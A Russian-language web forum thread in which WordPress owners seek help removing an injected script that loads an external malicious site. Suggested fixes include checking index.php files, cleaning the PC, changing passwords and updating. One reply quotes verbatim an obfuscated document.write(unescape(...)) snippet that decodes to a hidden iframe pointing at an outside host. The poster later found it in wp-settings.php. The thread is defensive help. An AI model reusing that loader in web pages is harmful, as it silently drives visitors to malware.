Спасите! Сайт заражен вирусом!

Добрый день!
Дорогие форумчане, спасите!
Захожу сегодня на свой сайт, а там какая-то зараза загружается еще в статусной строке и долго-долго.
(_www.wp-stsats.info, не запомнил точно).

Я на самом деле пренебрегал всеми способами защиты, начиная от того что держал пароль в ТоталКомандере, кончая тем, что до сих пор не обновлял WP с версии 2.2.
Но это уже случилось и я не знаю как от этого избавится!!!
Читал в одной из тем, что нужно искать строку в index.php, но у меня там нет никаких лишних кодов, только

<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>

наверное имелось ввиду index в папке темы, но там много кода, но вроде ничего нет похоже на то что указывалось в теме:http://forum.maxsite.org/viewtopic.php?pid=12083

Мог ли вирус в какой-то другой файл (отличный от index.php) залезть, но вставить в index.php какую-то ссылку на страницу с вирусом.

прошу прощения, если объясняюсь невнятно, до не могу никак отойти от шока.
Пожалуйста, скажите что делать!

Смотрите все index.php во всех папках. Может и другой файл зацепить – вирусописатели не дремлют. Чаще всего или в начале, или в конце файла дописывается или жабаскрипт, или iframe.

НО!!! Перед тем как смотреть, хорошенько вычистите свой комп. Или, если дело не терпит, смотрите с другого, заведомо чистого компа.

И обязательно поменяйте все пароли.

🙁 Все еще актуально.
Сайт до сих пор заражен вирусом!!!

Пароли поменял, из TC убрал запоминание пароля.
Проверил на вирусы компьютер. Нашел десяток зараженных файлов, включая файлы TotalCommander’a. Удалил и вылечил.
Проверил многие файлы сайта, iframe не нашел. как должен выглядеть Javascript вируса?
И как вообще можно найти этот вирус?

тему поменяй.. или скачай новую, или, если сам рисовал залей архив. И это, проадейтся что ли заодно..

Наврядли код с вирусом воткнут в файл с темой, скорей всего в index.php в корне.
В самом конце index.php ищите

все еще актуально, млин!
– в главном index.php – ничего особого нет,б в начале темы я описал его содержание.
– тема разработана мной, поэтому нигде ее скачать чистенькую невозможно.

есть ли еще какие-то варианты? очень надо. спасибо.

- тема разработана мной, поэтому нигде ее скачать чистенькую невозможно.

Что, и бекапа нет? Да вы, батенька, простите, баклан 🙁 Не в обиду – просто это здорово усложняет.

Версия WP какая? Обновись до последней – заодно с гарантией перепишешь все файлы, которые содержат какой то код. Прошерсти тему, если сам писал – думаю увидишь нет ли там чего нить лишнего. Я бы посмотрел базу еще. Но вот только как именно – пока без идей. А, вот еще – я бы посмотрел в базе в первую очередь таблицу wp_postmeta на предмет чего то лишнего. Выбираешь базу и рядом с этой таблицей щелкаешь иконку обзор. Она первая. Тока бекапься, а то мало ли.

Баклан,баклан…да хоть филин :).

Файлы темы все-таки нашел на одной из записанных мной болванок.
Залил. Но при загрузке все равно грузился этот троян.
Отключил тему, включил стандартный шаблон. Все равно грузится троян.
Отключил все плагины – безрезультатно. грузится.
Ну, думаю, значит заражены файлы WP.
Обновил блог до версии WP 2.3.1 , но…
все равно при загрузке сайта в статусной строке появляется:идет соединение с www. wp – stats – php.info.

Я бы посмотрел базу еще. Но вот только как именно - пока без идей. А, вот еще - я бы посмотрел в базе в первую очередь таблицу wp_postmeta на предмет чего то лишнего. Выбираешь базу и рядом с этой таблицей щелкаешь иконку обзор

Базу пока не смотрел. Не знаю как должно выглядеть это "лишнее". И как случайно не удалить нужное…

У меня такое было – сначала почисть гадость на своем компе антивирусом, а потом поменяй пароль доступа к фтп и все пеустанови – базу можно не трогать… Пароль твой просто украли с коммандера, похоже…

Пароль на доступ к админке менял? Если ничего не помогает – ася в профиле, пиши, попробуем что нить придумать. А вообще – если что то со строкой статуса, то это скорее всего ява скрипт какой нить. открываешь сайт, смотришь исходный код и смотришь нет ли какого нить гадкого скрипта. Делать лучше при оключеных плагинах – так меньше скриптов грузится (плагины ведь еще и свои подгружают.)

У меня тажа проблема каким то макаром подхватил trojan.downloader.js.agent.aam
и никак не могу найти где он засел уже все файлы перебрал, а он жабаскрипт в самом верху страницы добавляет и всё тут

<html>
<body>
<Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%6E%74%72%30%2E%63%6F%6D%2F%74%65%73%74%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%36%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script>
</html>

погите может кто уже сталкивался и знает что нужно снести что бы от него избавиться!!!

Проблема найдена, этот засранец сидел в конце файла wp-settings.php

Прочитал сабж, вспомнил топик с бора ))

(c)http://bash.org.ru/quote/393351

Uzver: А никто не покажет образчик лога симантека? Как выглядит энто?

Seaman:
вот так 
Цитата: Эта. Хазяин, тут типа к тебе вирус какой то. Ево сразу мочить или в турьму для пыток?

Для сравнения лог каспера 
Цитата:
ААААААА!!!!!!! Вирусы [censored], мы все умрем, что же делоть, [censored] атака, [censored], апокалипсис. А нет. Это всего лишь жепег. Извините, был напуган
Anonymous
Отправить
Ответ на: